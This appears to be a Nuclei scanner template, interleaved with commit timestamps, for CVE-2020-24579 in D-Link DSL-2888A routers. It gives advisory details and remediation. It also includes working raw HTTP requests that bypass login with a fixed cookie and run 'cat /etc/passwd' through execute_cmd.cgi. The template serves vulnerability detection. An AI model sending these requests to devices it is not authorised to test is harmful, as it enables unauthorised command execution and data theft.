2021-01-30 17:41:47 +00:00
id : CVE-2020-24579
info :
2022-07-26 13:45:11 +00:00
name : D-Link DSL 2888a - Authentication Bypass/Remote Command Execution
2021-01-30 17:41:47 +00:00
author : pikpikcu
2021-09-10 11:26:40 +00:00
severity : high
2022-07-26 13:45:11 +00:00
description : D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to bypass authentication and execute arbitrary commands on the affected router.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the latest firmware update provided by D-Link to fix the vulnerability.
2022-04-22 10:38:41 +00:00
reference :
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
2022-05-17 09:18:12 +00:00
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-24579
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/Elsfa7-110/kenzer-templates
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 8.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-24579
cwe-id : CWE-287
2023-12-12 11:07:52 +00:00
epss-score : 0.04563
2024-03-23 09:28:19 +00:00
epss-percentile : 0.9232
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-15 16:29:17 +00:00
vendor : dlink
product : dsl2888a_firmware
tags : cve,cve2020,dlink,rce
2021-01-30 17:41:47 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-01-30 17:41:47 +00:00
- raw :
- | # Response:Location : /page/login/login_fail.html
POST / HTTP/1.1
Host : {{Hostname}}
Cookie : uid=6gPjT2ipmNz
username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
- | # Get /etc/passwd
GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
Host : {{Hostname}}
Cookie : uid=6gPjT2ipmNz
matchers-condition : and
matchers :
- type : regex
regex :
- "nobody:[x*]:65534:65534"
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-01-31 10:28:15 +00:00
condition : or
2023-07-15 16:29:17 +00:00
- type : status
status :
- 200
2024-03-25 11:57:16 +00:00
# digest: 4a0a004730450220066bfa74b2f1b728ce53f16ab6639e0ff98246333be3a0ad3fe83f7c64c33bb6022100eaac438fe3d62f74001b2af20f8088179ba40ea0e089b87468ccea9a4689a3d7:922c64590222798bb761d5b6d8e72950